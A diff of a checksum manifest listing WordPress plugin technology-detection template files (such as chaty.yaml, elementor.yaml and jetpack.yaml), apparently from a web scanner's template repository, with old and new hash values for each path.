-http/technologies/wordpress/plugins/chaty.yaml:56e75be266a3df97a9bd96a1be5969ce6f1c601a -http/technologies/wordpress/plugins/child-theme-configurator.yaml:eb93896a42336e406fdbc4c0c224ba2137a045fd -http/technologies/wordpress/plugins/classic-editor.yaml:7472544b59952d9e488b9479373f674dcd504698 -http/technologies/wordpress/plugins/classic-widgets.yaml:e09b4c360d3b798440e0705d9e44e87baae238dd -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:51350dbb567dd46b75e9a7a5b3168bcf99c079e0 +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:760de8aae1d370996b6b7ab5f02961b673a8f4ba -http/technologies/wordpress/plugins/coblocks.yaml:09d89263f646e5e0b87f990ba38f043edc8ef1d4 -http/technologies/wordpress/plugins/code-snippets.yaml:4ec6bac5b93b6bc48ca4c658a4e44a48db45437f -http/technologies/wordpress/plugins/coming-soon.yaml:127d526f41beb277267848f9766495d93037bc8a -http/technologies/wordpress/plugins/complianz-gdpr.yaml:fe3df481e507e06ae7bd75e8274329ac122ebd4e -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:fc3284a54f46f1904d7e367f72a841f44a60184c -http/technologies/wordpress/plugins/contact-form-7.yaml:a7a98529a22cc2ffefc8f39e57704d4d7b24c743 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:787cdade7bfca275c8044c0d22f159c69d38cf94 -http/technologies/wordpress/plugins/cookie-law-info.yaml:3f3654b83db3e10f32e58186fc4706c92a61333b -http/technologies/wordpress/plugins/cookie-notice.yaml:282b48cf73ea493e94480cfe762001430e670dd8 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:739b0da6d12e7a54beae64fec15ba5489f92a76c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:024e57dc3d6252e31da74d796d4adb64e52f46b4 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:cb9cfb3a524411d3cf587af448d4d67524dc806b -http/technologies/wordpress/plugins/custom-css-js.yaml:2ea96134e7ecd686347fe547cc4e3ae9180f29f6 -http/technologies/wordpress/plugins/custom-fonts.yaml:b070221f62ce6b293246d67bda7a487c35cddd34 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:bcb9e6d2d00f130fdc992116d9eb74d63af01983 -http/technologies/wordpress/plugins/disable-comments.yaml:6b1efa4654dca1c4d3f7143e20d1af0f6338371e -http/technologies/wordpress/plugins/disable-gutenberg.yaml:00a576e9ee4fbfad19d9b6f76051b666285082b2 -http/technologies/wordpress/plugins/duplicate-page.yaml:ecc0a5b0227ca11ea92356eedfaaaeee9a8ccfdd -http/technologies/wordpress/plugins/duplicate-post.yaml:661a248fe506f8c5a90f516efddb472462aaa555 -http/technologies/wordpress/plugins/duplicator.yaml:1a51e74174628dc8fecefcc4a1357a22f31c864f -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:22a0ccc964f1077aabb44ed11e6c2216f5f18c23 +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:b6c2eb154b5f9fd41712b3c5b459a0054840ceed -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7ddf504f55b31442ef2b56059cc5870e0e29391a -http/technologies/wordpress/plugins/elementor.yaml:e20569fbd5effbc6110c0afacc7b173467786a94 -http/technologies/wordpress/plugins/elementskit-lite.yaml:a3c3a9c532ca7e6a395ebbae65724e690e4ad560 -http/technologies/wordpress/plugins/enable-media-replace.yaml:96d6618f34adaa48aeb7addc9c28434d42465c09 -http/technologies/wordpress/plugins/envato-elements.yaml:aa52d86df76b910523d3b136c2cd7b509a1ac31d -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:95a1b73bc6ae282eb2bad75959a7fcc42078fce3 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:c76568be06469e9b389903c7f97666e80ac15a4a -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:b42e86c50387c938e1f531ffec3b4fffddfae403 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:1d7d8bbb4b4c1cf04af7d21fe5f0ad7ce4c40a9c -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:622e422741eb96285719822a3505550494b023b9 -http/technologies/wordpress/plugins/flamingo.yaml:71729d1a93512cb2654e4a8f0217dfc5f34ff1fd -http/technologies/wordpress/plugins/fluentform.yaml:ba86fa363674bea94f96ffc542311c10c668f380 -http/technologies/wordpress/plugins/font-awesome.yaml:70b67a78bb374be8c8c7e67dc6a7d86d7a6c264e -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:573c7bb9f9d9d8898b09752bcf6b3c4d567cedab -http/technologies/wordpress/plugins/formidable.yaml:c01de2367bc79d4a90850de4bbc47b95bfaa31b1 -http/technologies/wordpress/plugins/forminator.yaml:b467ff2ebb80f0ab600d043b2c16dddcd06ca78c -http/technologies/wordpress/plugins/ga-google-analytics.yaml:7d1d4e23e0e390a54f551b1f5f2cb346201a1287 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:e2e70790b5bf0c7eeecbf2177de6ea586ca6f2ae -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:6be7bc00a40ebe98ae6d7f0cc7c8911bec424c85 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:41271f5fffb5cf6ea7800f0c568beb9f7b417d1f -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:7bcc4b36bc003928cd9c85831739b03d77e378d5 -http/technologies/wordpress/plugins/google-site-kit.yaml:e199dc9b16346d205343369c1cb037e1c0b81549 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:6cf01c208d481114e5b74d40fa76920f2ee340c9 -http/technologies/wordpress/plugins/gtranslate.yaml:e94fcb9e69e967674b12954f43d3f0b10653c7d2 -http/technologies/wordpress/plugins/gutenberg.yaml:f013246d544291befc978cc95d3d27d692c24434 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:c1cd2fbb1033d77055d742b747f69fe709f478bd +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:af5791c264a4a69d0efdd19e8ed097442027bb68 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:f6526564ad30cec4c7195b3315eca085bc422fc4 -http/technologies/wordpress/plugins/header-footer.yaml:a6f6e98e8dde967e6cc610f8acbb7b186c507862 -http/technologies/wordpress/plugins/health-check.yaml:78c6405804dc7b61ef1a0dfc0991973b2aba2119 -http/technologies/wordpress/plugins/hello-dolly.yaml:68919a7ac821d69e1a4985cbe656144b69fab4ab -http/technologies/wordpress/plugins/host-webfonts-local.yaml:e2c7f8c5089fa014b2953c6e7754805660605fa3 -http/technologies/wordpress/plugins/hostinger.yaml:183ff3f8d81f0d72da557a3812b4746d3100f386 -http/technologies/wordpress/plugins/image-optimization.yaml:51bdf0c950daed94e69ebca61d382b6811c892ec -http/technologies/wordpress/plugins/imagify.yaml:a1fbbdd996f3cc147864b82bd612e761a9525056 -http/technologies/wordpress/plugins/imsanity.yaml:200eb250c39321074c2f04794268144b3a952dcb -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:3d6216cb0c557540fad0e6c0087e1afe2a18a1b3 -http/technologies/wordpress/plugins/instagram-feed.yaml:dd7083ce59f959f0f49e4f0f1a875bf03eb28b97 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:f78c1f1f1706bcd1e0b2a7cf82aa1ba0a6af34e3 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:c204b0dca0de9219d3c0bbaa945866e3011474e6 -http/technologies/wordpress/plugins/jetpack.yaml:b2f5a05d5bfd29f4fd52cf6dabf28e1f2f77d688 -http/technologies/wordpress/plugins/kadence-blocks.yaml:ea7f2e04f65f2458f3cd90996568c2f574d77d84 -http/technologies/wordpress/plugins/kirki.yaml:3449c89e1cf9ebcc31fffcce70dd812f03deea87 -http/technologies/wordpress/plugins/leadin.yaml:41f46cd03032c3b3dec072850cd847120bad4a2c -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:57758f93dba5af902338c2a8b866f0edc0f86157 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:6c0fd6b4a7a266240a5e1a4b16716a5ba6240fc6 -http/technologies/wordpress/plugins/litespeed-cache.yaml:f639effb4beb6dc4cabd9344732493de65954bc8 -http/technologies/wordpress/plugins/loco-translate.yaml:1c3a44db72c36a2cae42ebf0474c8eaf8413fac9 -http/technologies/wordpress/plugins/loginizer.yaml:290d525a7391f7b2f07d96a7505854a1ce94c80b +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:5524653216ff80990f77539d421cb8f7d0622949 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:cee5b74f023ed51e08ce75be618b80eb2fb94dea -http/technologies/wordpress/plugins/mailpoet.yaml:d46aaba624398386b2a085122523a3982bfafe03 -http/technologies/wordpress/plugins/maintenance.yaml:79c99be8b21f79b08dd49368a39f57865beff688 -http/technologies/wordpress/plugins/mainwp-child.yaml:ddf840e509c33e192f175d9490adedbe02c1b82d -http/technologies/wordpress/plugins/malcare-security.yaml:fa29dfe4bf83448143e675e45412081fc897fd84 -http/technologies/wordpress/plugins/megamenu.yaml:8f245327c9508a1682e832fa8155ed1caf66a0e8 -http/technologies/wordpress/plugins/members.yaml:5a14c20266f7d95dbc0f11d9e04399153d45a74c -http/technologies/wordpress/plugins/meta-box.yaml:b6f6639b349bad21e07761ed22b3efc5e02e972a -http/technologies/wordpress/plugins/metform.yaml:488157de2e2395cc63c6ac2994e28803ba8c3a60 -http/technologies/wordpress/plugins/ml-slider.yaml:5ed7d2dbbd3378a088aa81acf61d86cb4afef29b -http/technologies/wordpress/plugins/newsletter.yaml:8262d663b2d265ab7930628b392b6a84a9156906 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:1ec089cdbdf517e3bf26f28e2abbc4a451bd3d0f -http/technologies/wordpress/plugins/nextgen-gallery.yaml:843055b0498f71478c2aaa6c7c551cb200a4ce5b -http/technologies/wordpress/plugins/ninja-forms.yaml:05fadcc46f9f151510a2ce501fc36d46398fd8d7 -http/technologies/wordpress/plugins/ocean-extra.yaml:c75126536db36eecd128aa52a28d83ea0f11a00d -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:0fef4705738b28430b1c5b2ce1916e5741f96b70 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:9ef339b373058078097db77f94b44fefb9f72e94 -http/technologies/wordpress/plugins/optinmonster.yaml:1ecad6d8b92ce078eaf87eaa473ae17c9a34a86e -http/technologies/wordpress/plugins/otter-blocks.yaml:e579ef87a342a0dda0ea7955f535ad23e1f17770 -http/technologies/wordpress/plugins/password-protected.yaml:2400a7341c61f566d21536bf2101fccc1d4278c2 -http/technologies/wordpress/plugins/pdf-embedder.yaml:926ba3aa7b24aa95f090b7560715ba4d960a006a +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:9ad4a8d0ba9773e2d1a70e2e31b82979dbf4cdab -http/technologies/wordpress/plugins/pixelyoursite.yaml:dfd58a39c2eed892c82ef11dd0fda68181cbce19 -http/technologies/wordpress/plugins/polylang.yaml:620ffd83ceef984165d299aef7527e531f5c3c27 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:ef836cf54e3ee71c98f58fc7113110cf93b689e6 -http/technologies/wordpress/plugins/post-smtp.yaml:8ed21e9864e22e3229ef33f3b87a9b25681997ac -http/technologies/wordpress/plugins/post-types-order.yaml:17b80558e32b9d453e28e3b54b0c42c56273495f -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:1d2e8d69fc5b76aeaa041530e65d613479bd3817 -http/technologies/wordpress/plugins/pretty-link.yaml:9b946b9abccdfe8d12f842238a369febb8f5ba5b -http/technologies/wordpress/plugins/really-simple-captcha.yaml:19bc2f04a88db57b8d1d22397e06b92219a9e0d4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:0d36d681f84a5ab96061d293446f11d14875fe64 -http/technologies/wordpress/plugins/redirection.yaml:54c03b78894f04dcb48ce9b9e5628a64532fb806 -http/technologies/wordpress/plugins/redux-framework.yaml:38da11e44d323b1a619b517825ad29f94c26bb54 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:abf020960d394d201359636a100ae064292136d9 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:711a8be3305a53c4de43f2ee1957efdedcf442fe -http/technologies/wordpress/plugins/safe-svg.yaml:2c3990298434705240877bbeb072d72a89971da9 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:b79530e1ec4d9ce9747c5da619e70332b1627c0b -http/technologies/wordpress/plugins/sg-cachepress.yaml:a1ad11f190cdf48ab70ce5d2f84e741751cd32e2 -http/technologies/wordpress/plugins/sg-security.yaml:4dfb19061dddd715515634bdde3338f47c98fabe -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:e6924c3fefbf636861fdd94a6675b5d5ea956d0d -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:2c65263bd298dc7aa745a1c6fe1a71e0a303ece4 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:4bbb6d4f33111581009f176b3c9a56122177153d -http/technologies/wordpress/plugins/simple-history.yaml:c47677ff47b8b8f4177a594dccac611d01b22a0d +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:b58f773ff54e65cbd131df643230227052e56fca -http/technologies/wordpress/plugins/siteorigin-panels.yaml:5e421d52fe5aae3d5cd53f6d795181c3095d60ac -http/technologies/wordpress/plugins/smart-slider-3.yaml:5f28830f620dda88cc3c6d4906e2fe6934c74a12 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:2c6504c87079ba7fa5f6989eb97f44511dbcd0ee +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:a7018bb70e231b5ece4f7b6b2956fb92481ad6bf -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:22fc50b8b14d31c037f9211c9d77877fa1e83c53 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:7c2790e29dc73b70977ac1a11e9094862d34ddbb +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b 